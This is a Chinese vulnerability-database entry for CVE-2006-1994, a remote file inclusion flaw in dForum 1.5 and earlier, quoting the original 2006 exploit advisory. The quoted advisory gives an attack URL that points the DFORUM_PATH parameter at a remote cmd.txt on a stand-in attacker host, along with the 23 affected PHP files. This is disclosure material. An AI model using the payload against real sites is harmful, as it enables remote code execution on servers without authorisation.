dForum 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110117 漏洞类型 输入验证
发布时间 2006-04-21 更新时间 2006-04-26
CVE编号 CVE-2006-1994 CNNVD-ID CNNVD-200604-455
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1706
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-455
|漏洞详情
dForum1.5及早期版本中存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于传递到(1)about.php、(2)admin.php、(3)anmelden.php、(4)losethread.php、(5)config.php、(6)delpost.php、(7)delthread.php、(8)dfcode.php、(9)download.php、(10)editanoc.php、(11)forum.php、(12)login.php、(13)makethread.php、(14)menu.php、(15)newthread.php、(16)openthread.php、(17)overview.php、(18)post.php、(19)suchen.php、(20)user.php、(21)userconfig.php、(22)userinfo.php和(23)verwalten.php中的DFORUM_PATH参数执行任意PHP代码。
|漏洞EXP
dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]
|参考资料

来源:BID
名称:17650
链接:http://www.securityfocus.com/bid/17650
来源:BUGTRAQ
名称:20060421dForum<=1.5MultipleRemoteFileInclusionVulnerabilities.
链接:http://www.securityfocus.com/archive/1/431758
来源:MISC
链接:http://www.nukedx.com/?viewdoc=27
来源:VUPEN
名称:ADV-2006-1482
链接:http://www.frsirt.com/english/advisories/2006/1482
来源:SECUNIA
名称:19788
链接:http://secunia.com/advisories/19788
来源:XF
名称:dforum-dforumpath-parameter-file-include(26035)
链接:http://xforce.iss.net/xforce/xfdb/26035
来源:FULLDISC
名称:20060421dForum<=1.5MultipleRemoteFileInclusionVulnerabilities.
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045369.html